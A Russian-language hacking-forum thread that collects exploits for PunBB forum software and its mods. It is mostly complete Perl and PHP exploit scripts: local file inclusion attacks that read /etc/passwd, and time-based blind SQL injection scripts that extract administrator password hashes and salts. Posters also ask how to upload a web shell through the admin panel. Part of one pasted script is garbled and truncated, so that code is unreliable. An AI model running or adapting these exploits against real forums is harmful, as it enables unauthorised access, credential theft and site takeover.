ANTICHAT - [Обзор уязвимостей PunBB]

ANTICHAT (https://forum.antichat.xyz/index.php)

- Уязвимости CMS / форумов (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - [Обзор уязвимостей PunBB] (https://forum.antichat.xyz/showthread.php?t=59281)

PHP код:


		
			
#!/usr/bin/perl



=about



    PunBB (PunPortal 0.1) Local File Inclusion Exploit

    --------------------------------------------------

    by athos - staker[at]hotmail[dot]it

    download mod http://www.punres.org/download.php?id=1108

    download cms http://punbb.org



    register globals = 1

    magic quotes gcp = 1

    

  

    

    File (include/login.php)

    

    1. <?php

    2.

    3. // Show login if not logged in

    4. if($pun_user['is_guest'])

    5. {

    6. if(!isset($focus_element) || (isset($focus_element) && !in_array('login', $focus_element)))

    7. {

    8. 

    9. // Load the language files

    10. require PUN_ROOT.'lang/'.$pun_user['language'].'/common.php';

    11. require PUN_ROOT.'lang/'.$pun_user['language'].'/login.php';

    

    

    $pun_user['is_guest'] isn't declared

    $pun_user['language'] isn't declared

    

    include/user/login.php?pun_user[is_guest]=a&pun_user[language]=../../etc/passwd%00

    

    how to fix?use the latest version (2.0) 

     

    Usage: perl punbb.pl localhost/cms

    

=cut





use strict;

use warnings;

use IO::Socket;





my $html = undef;

my $site = $ARGV[0] or &help;

my @take = split /\//,$site;



my ($host,$path) = @take;



if($site =~ /http:\/\/(.+?)/i) {

  print STDOUT "Invalid URL\n";

  exit;

}



print STDOUT "Local File (ex: ../../etc/passwd)\n";

print STDOUT "Local File: ";

  

chomp(my $file = <STDIN>);



if(not defined($file)) {

  print STDOUT "File Not Defined!\n";

  exit;

}





my $evil = "/include/user/login.php?pun_user[is_guest]=a&pun_user[language]=";



my $sock = new IO::Socket::INET(

                                 PeerAddr => $host,

                                 PeerPort => 80,

                                 Proto    => 'tcp',

                                 Timeout  => 6,

                              ) or die $!;   



my $data = "GET /${path}/${evil}${file}%00 HTTP/1.1\r\n".

           "Host: $host\r\n".

           "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n".

           "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n".

           "Accept-Language: en-us,en;q=0.5\r\n".

           "Accept-Encoding: gzip,deflate\r\n".

           "Connection: close\r\n\r\n";



$sock->send($data);



while(<$sock>) {

  $html .= $_;

}           



if($html =~ /(No such file or directory|HTTP\/1.1 404 Not Found)/i) {

  print STDOUT "Exploit Failed!\n";

  exit;

}

else {

  my $name = int(rand(999)).'.txt';

  

  open(FILE,">",$name);

  print FILE $html;

  close(FILE);

  

  print STDOUT "Exploit Successfully!\n";

  print STDOUT "$name saved!\n";

  exit;

}





sub help {

  print STDOUT "PunBB (PunPortal 0.1) Local File Inclusion Exploit\n".

               "by athos - staker[at]hotmail[dot]it\n".

               "Usage: perl $0 [host/path]\n";

  exit;

}

http://www.milw0rm.com/exploits/7168 (с)

PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit

PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit

Код:

#!/usr/bin/perl

#[0-Day] PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit

#Coded By Dante90, WaRWolFz Crew

#Bug Discovered By: Dante90, WaRWolFz Crew



use strict;

use LWP::UserAgent;

use HTTP::Cookies;



use HTTP::Request::Common;

use Time::HiRes;

use IO::Socket;



my ($UserName,$PassWord,$ID) = @ARGV;

if(@ARGV < 3){

    &usage();

    exit();

}

my $Message = "";

my ($Hash,$Time,$Time_Start,$Time_End,$Response);

my($Start,$End);

my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);

my $Host = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link

my $Method = HTTP::Request->new(POST => $Host);

my $Cookies = new HTTP::Cookies;

my $HTTP = new LWP::UserAgent(

            agent => 'Mozilla/5.0',

            max_redirect => 0,

            cookie_jar => $Cookies,

        ) or die $!;

my $Referrer = "form_sent=1&pid=10174&poster=Dante90, WaRWolFz Crew&method=1&req_message=http://www.warwolfz.com/&submit=Invia";

my $DefaultTime = request($Referrer);



sub Login(){

    my $Login = $HTTP->post($Host.'login.php?action=in',

                [

                    form_sent        => '1',

                    redirect_url    => 'forums.php',

                    req_username    => $UserName,

                    req_password    => $PassWord,

                    login => 'Login',

                ]) || die $!;



    if($Login->content =~ /Logged in successfully./i){

        return 1;

    }else{

        return 0;

    }

}

if (Login() == 1){

    $Message = " * Logged in as: ".$UserName;

}elsif (Login() == 0){

    $Message = " * Login Failed.";

    refresh($Message, $Host, $DefaultTime, "0", $Hash, $Time, "1");

    print " * Exploit Failed                                     *\n";

    print " ------------------------------------------------------ \n";

    exit;

}



sub Blind_SQL_Jnjection{

    my ($dec,$hex) = @_;

    return "Dante90, WaRWolFz Crew\" OR ASCII(SUBSTRING((SELECT `password` FROM `users` WHERE `id`=${ID}),${dec},1))=${hex}/*";

}



for(my $I=1; $I<=40; $I++){ #N Hash characters

    for(my $J=0; $J<=15; $J++){ #0 -> F

        my $Post = $HTTP->post($Host.'reputation.php?',[

                    form_sent    => '1',

                    pid            => '2',

                    poster        => Blind_SQL_Jnjection($I,$chars[$J]),

                    method        => '1',

                    req_message    => 'http://www.warwolfz.com/',

                    submit        => 'Submit',

                ]) || die $!;

        $Time = request($Referrer);

        refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);

        if($Post->content =~ /(The reputation has been successfully changed)/i){

            syswrite(STDOUT,chr($chars[$J]));

            $Hash .= chr($chars[$J]);

            $Time = request($Referrer);

            refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);

            last;

        }

    }

    if($I == 1 && length $Hash < 1 && !$Hash){

        print " * Exploit Failed                                     *\n";

        print " ------------------------------------------------------ \n";

        exit;

    }

    if($I == 40){

        print " * Exploit Successed                                  *\n";

        print " ------------------------------------------------------\n ";

        system("pause");

    }

}



sub usage{

    system("cls");

    {

        print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit\n";

        print " ------------------------------------------------------ \n";

        print " * USAGE:                                             *\n";

        print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";

        print " * perl name_exploit.pl [username] [password] [id]    *\n";

        print " ------------------------------------------------------ \n";

        print " *         Powered By Dante90, WaRWolFz Crew          *\n";

        print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";

        print " ------------------------------------------------------ \n";

    };

    exit;

}



sub request{

    $Referrer = $_[0];

    $Method->content_type('application/x-www-form-urlencoded');

    $Method->content($Referrer);

    $Start = Time::HiRes::time();

    $Response = $HTTP->request($Method);

    $Response->is_success() or die "$Host : ", $Response->message,"\n";

    $End = Time::HiRes::time();

    $Time = $End - $Start;

    return $Time;

}



sub refresh{

    system("cls");

    {

        print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit\n";

        print " ------------------------------------------------------ \n";

        print " * USAGE:                                             *\n";

        print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";

        print " * perl name_exploit.pl [username] [password] [id]    *\n";

        print " ------------------------------------------------------ \n";

        print " *         Powered By Dante90, WaRWolFz Crew          *\n";

        print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";

        print " ------------------------------------------------------ \n";

    };

    print $_[0] ."\n";

    print " * Victime Site: " . $_[1] . "\n";

    print " * Default Time: " . $_[2] . " seconds\n";

    print " * BruteForcing Hash: " . chr($chars[$_[3]]) . "\n";

    print " * BruteForcing N Char Hash: " . $_[6] . "\n";

    print " * SQL Time: " . $_[5] . " seconds\n";

    print " * Hash: " . $_[4] . "\n";

}



#WaRWolFz Crew



# milw0rm.com [2009-07-28]

PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit

PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit

Код:

#!/usr/bin/perl

#[0-Day] PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit

#Coded By Dante90, WaRWolFz Crew

#Bug Discovered By: Dante90, WaRWolFz Crew

#register_globals = On

#magic_quotes_gpc = On





use LWP::UserAgent;

use HTTP::Cookies;

use strict;



my $EtcPasswd;

my $TransversalDirectory = "./../../../../"; #Transversal Directory

my $LFI = "etc/passwd"; #File Inject

my $HostName = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link



my $Referrer = "http://www.warwolfz.com/";



my $Cookies = new HTTP::Cookies;

my $UserAgent = new LWP::UserAgent(

                        agent => 'Mozilla/5.0',

                        max_redirect => 0,



                        cookie_jar => $Cookies,

                ) or die $!;



sub Local_File_Inclusion{

        my ($Directory,$Command) = @_;

        return "./include/reputation/rep_profile.php?pun_user[language]=${Directory}${Command}%00";



}



my $Get = $UserAgent->get($HostName.Local_File_Inclusion($TransversalDirectory,$LFI));



if ($Get->content =~ /No such file or directory in/i){

        refresh($HostName, "Exploit Filed");

        print " * Error extracting sensible data.\n";



        print " * Exploit Failed                                     *\n";

        print " ------------------------------------------------------ \n\n";

}else{

        $EtcPasswd = $Get->content;

        open ( FILE , ">WaRWolFz.html" ) or die $!;



        print FILE $EtcPasswd;

        close ( FILE );

        refresh($HostName, "File Saved");

        print " * Exploit Successed                                  *\n";

        print " ------------------------------------------------------\n\n";



        system("pause");

}



sub usage{

        system("cls");

        {

                print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit\n";

                print " ------------------------------------------------------ \n";



                print " * USAGE:                                             *\n";

                print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";

                print " * perl name_exploit.pl                               *\n";



                print " ------------------------------------------------------ \n";

                print " *         Powered By Dante90, WaRWolFz Crew          *\n";

                print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";



                print " ------------------------------------------------------ \n";

        };

        exit;

}



sub refresh{

        system("cls");

        {

                print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit\n";



                print " ------------------------------------------------------ \n";

                print " * USAGE:                                             *\n";

                print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";



                print " * perl name_exploit.pl                               *\n";

                print " ------------------------------------------------------ \n";

                print " *         Powered By Dante90, WaRWolFz Crew          *\n";



                print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";

                print " ------------------------------------------------------ \n";



        };

        print " * Victime Site: " . $_[0] . "\n";

        print " * Etc/Passwd: " . $_[1] . "\n";

}



#WaRWolFz



# milw0rm.com [2009-07-30]

Punbb Extension Attachment <= v1.0.2 Bind SQL injection exploit

Код:

f (isset($_GET['secure_str']))

{

if (preg_match('~(\d+)f(\d+)~', $_GET['secure_str'], $match))

{

...

'WHERE'        => 'a.id = '.$attach_item.' AND (fp.read_forum IS NULL OR fp.read_forum = 1)

Злоупотребление preg_match:(

Код:

#!/usr/bin/php

<?php



print_r('

+---------------------------------------------------------------------------+

Punbb Extension Attachment <= v1.0.2 Bind SQL injection exploit

by puret_t

mail: puretot at gmail dot com

team: http://www.wolvez.org

dork: "Powered by PunBB"

+---------------------------------------------------------------------------+

');

/**

* works regardless of php.ini settings

*/

if ($argc < 3) {

print_r('

+---------------------------------------------------------------------------+

Usage: php '.$argv[0].' host path

host:      target server (ip/hostname)

path:      path to punbb

Example:

php '.$argv[0].' localhost /punbb/

+---------------------------------------------------------------------------+

');

exit;

}



error_reporting(7);

ini_set('max_execution_time', 0);



$host = $argv[1];

$path = $argv[2];



$pre = 'pun_';



$benchmark = 200000000;

$timeout = 10;



echo "Plz Waiting...\nPassword:\n";

/**

* get pass

*/

$j = 1;

$pass = '';



$hash[0] = 0; //null

$hash = array_merge($hash, range(48, 57)); //numbers

$hash = array_merge($hash, range(97, 122)); //az letters



while (strlen($pass) < 40) {

for ($i = 0; $i <= 255; $i ++) {

if (in_array($i, $hash)) {

$cmd = '1f1%27%20AND%20(IF((ASCII(SUBSTRING((SELECT%20password%20FROM%20'.$pre.'users%20WHERE%20group_id=1%20LIMIT%201),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))%23';

send();

usleep(2000000);

$starttime = time();

send();

$endtime = time();

$difftime = $endtime - $starttime;

if ($difftime > $timeout) {

$pass .= chr($i);

echo chr($i);

break;

}

}

if ($i == 255)

exit("\nExploit Failed!\n");

}

$j ++;

}



echo "\nSalt:\n";

/**

* get salt

*/

$j = 1;

$salt = '';



$hash[0] = 0; //null

$hash = array_merge($hash, range(33, 126));



while (strlen($salt) < 12) {

for ($i = 0; $i <= 255; $i ++) {

if (in_array($i, $hash)) {

$cmd = '1f1%27%20AND%20(IF((ASCII(SUBSTRING((SELECT%20salt%20FROM%20'.$pre.'users%20WHERE%20group_id=1%20LIMIT%201),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))%23';

send();

usleep(2000000);

$starttime = time();

send();

$endtime = time();

$difftime = $endtime - $starttime;

if ($difftime > $timeout) {

$salt .= chr($i);

echo chr($i);

break;

}

}

if ($i == 255)

exit("\nExploit Failed!\n");

}

$j ++;

}



exit("\nExpoilt Success!\nPassword Hash:\t$pass\nSalt:\t$salt\n");



function send()

{

global $host, $path, $cmd;



$data = "GET ".$path."misc.php?item=1&secure_str=".$cmd."  HTTP/1.1\r\n";

$data .= "Host: $host\r\n";

$data .= "Connection: Close\r\n\r\n";



$fp = fsockopen($host, 80);

fputs($fp, $data);



$resp = '';



while ($fp && !feof($fp))

$resp .= fread($fp, 1024);



return $resp;

}



?>

Цитата:

Сообщение от Welemir

На 1.3.4 LFi/RFI/inj ни у кого не завалялось,или уже не пентестят ?

есть блайнд

================================================== ===============

PunBB 526

# function pun_pm_edit_message()

# {

# global $forum_db, $forum_user,� �$lang_pun_pm;

#

# $errors = array();

#

# // Verify input data

# $query = array(

# 'SELECT' => 'm.id as id, m.sender_id as sender_id, m.status as status, u.username as username, m.subject� �as subject, m.body as body',

# 'FROM' =>� �'pun_pm_messages m',

# 'JOINS' => array(

# array(

# 'LEFT JO IN' => 'users AS u',

# 'ON' � � => '(u.id = m.receiver_id)'

# ),

# ),

# 'WHERE' => 'm.id = '.$forum_db->escape($_GET['message_id']).' AND m.sender_id = '.$forum_user['id'].' AND m.deleted_by_sender = 0'

# );

#

# ($hook = get_hook('pun_pm_fn_ed it_message_pre_validate_query')) ? eval($hook) : null;

#

# $result = $forum_db->query_build($query) or error(__FILE__, __LINE_ _);

# ----

# GET http://127.0.0.1/WaRWolFz/misc.php?section=pun_pm&pmpage=write&message_id=-1'

# Error - PunBB

# An error was encountered

# The error occurred on line 525 in ./WaRWolFz/extensions/pun_pm/functions.php

# Database reported: Errore di sintassi nell a query SQL vicino a '\ AND m.sender_id =� �2 AND m.deleted_by_sender = 0' linea 1 (Er rno: 1064).

usestrict;

usewarnings;

useLWP::UserAgent;

useHTTP::Cookies;

useHTTP::Request::Common;

useTime::HiRes;

useIO::Socket;

my($UserName,$PassWord,$ID) = @ARGV;

if (@ARGVnew(GET=>$Host);

my $Cookies= newHTTP::Cookies;

my $HTTP= newLWP::UserAgent(

agent=>'Mozilla/5.0',

max_redirect=>0,

cookie_jar=>$Cookies,

) or die $!;

my $Referrer="http://www.warwolfz.org/";

my $DefaultTime=request($Referrer);

sub request{

$Referrer=$_[0];

$Method->referrer($Referrer);

$Start=Time::HiRes::time();

$Response=$HTTP->request($Method);

$Response->is_success() or die"$Host: ",$Response->message,"\n";

$End=Time::HiRes::time();

$Time=$End-$Start;

return$Time;

}

sub Blind_SQL_Jnjection{

my($dec,$hex) = @_;

return"./misc.php?section=pun_pm&pmpage=write&message_id=-1 OR 1!=(SELECT IF((ASCII(SUBSTRING(`password`,${dec},1))=${hex}),benchmark(200000000,CHAR(0)),0) FROM `users` WHERE `id`=${ID})--";

}

sub Clear() {

my $launch= $^O eq'MSWin32'?'cls':'clear';

returnsystem($launch);

}

sub Login() {

if ($ARGV[4] =~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}?$/) {

$Cookies->proxy(['http','ftp'],'http://'.$ARGV[4]) or die $!;

}

my $Get=$HTTP->get($Host.'login.php');

my $csrf_token="";

if ($Get->content=~ /type="hidden"name="csrf_token"value="([a-f0-9]{1,40})/i) { #ByPassing csrf_token hidden input

$csrf_token= $1;

}

my$Login=$HTTP->post($Host.'login.php',

[

form_sent� � => '1',

redirect_u rl =>$Host.'login.php',

csrf_token =>$csrf_token,

req_userna me =>$UserName,

req_passwo rd =>$PassWord,

save_pass� � => '1',

login =>� �'Login',

]) || die $!;

if ($Login->content=~ /Verrai trasferito automaticamente ad una nuov a pagina in 1 secondo/i) { #English Language: You should automatic ally be forwarded to a new page in 1 seco nd.

return 1;

} else {

return 0;

}

}

sub usage {

Clear();

{

print "\n[0-Day]PunBB F

$Time_Start= time();

my$Get1=$HTTP->get($Host.Blind_SQL_Jnjection($I,$chars[$J]));

$Time_End= time();

$Time= request($Referrer);

refresh($Message,$Host,$DefaultTime,$J,$Hash,$Time,$I);

if ($Time_End-$Time_Start> 6) {

$Time= request($Referrer);

refresh($Message,$Host,$DefaultTime,$J,$Hash,$Time,$I);

if ($Time_End-$Time_Start> 6) {

syswrite(S TDOUT,chr($chars[$J]));

$Hash.= chr($chars[$J]);

$Time= request($Referrer);

refresh($Message,$Host,$DefaultTime,$J,$Hash,$Time,$I);

last;

}

}

}

if ($I== 1 && length$Hash[COLOR="#DD0000"]

Код:

# Exploit Title: Punbb 1.3.4 Full Path Disclosure

# Date: 07/11/2010

# Author: SYSTEM_OVERIDE, OverSecurityCrew

# Software Link: http://punbb.informer.com/

# Vulnerability Type: Full Path Disclosure

# Version: 1.3.4

Злоумышленник может узнать ROOTPATH.

Уязвимые файлы:

Код:

/search.php /userlist.php moderate.php

Example:

Код:

http://www.site.com/[path]/search.php?action=search&keywords[]=&author[]=&search_in=all&sort_by=0&SORT_DAshow_as=DESC&topics=&search=Submit+search

http://www.site.com/[path]/userlist.php?username[]=&show_group=-1&sort_by=username&sort_dir=ASC&search=Avvia+ricerca

http://www.site.com/[path]/moderate.php?get_host[]=

Подскажите, как зашеллить через админку (доступ в админку форму есть)

Как узнать версию вообще можно?

Цитата:

Сообщение от SergioBlog

Как узнать версию вообще можно?

Войдете в админку - там четко написано какая версия.

Я вот вошел, не пойму чё дальше делать, как шел залить.

Люди, подскажите сплоиты\баги PunBB 1.3

Или же следующих плагинов (папка extensions)

Цитата:

Сообщение от None

.dev/
.gitattributes
.gitignore
ajax_post_edit/
bbcode_smiles/
developer_helper/
fancy_video_tag/
hcs_forum_image/
hcs_image_uploader/
hcs_redirect_links/
hide/
index.html
jq_chat/
jquery/
nya_jquery_ui/
pun_admin_add_user/
pun_admin_clear_cache/
pun_antispam/
pun_attachment/
pun_bbcode/
pun_colored_usergroups/
pun_forum_news/
pun_jquery/
pun_karma/
pun_move_posts/
pun_pm/
pun_poll/
pun_repository/
pun_stop_bots/
pun_tags/
reputation/

Спасибо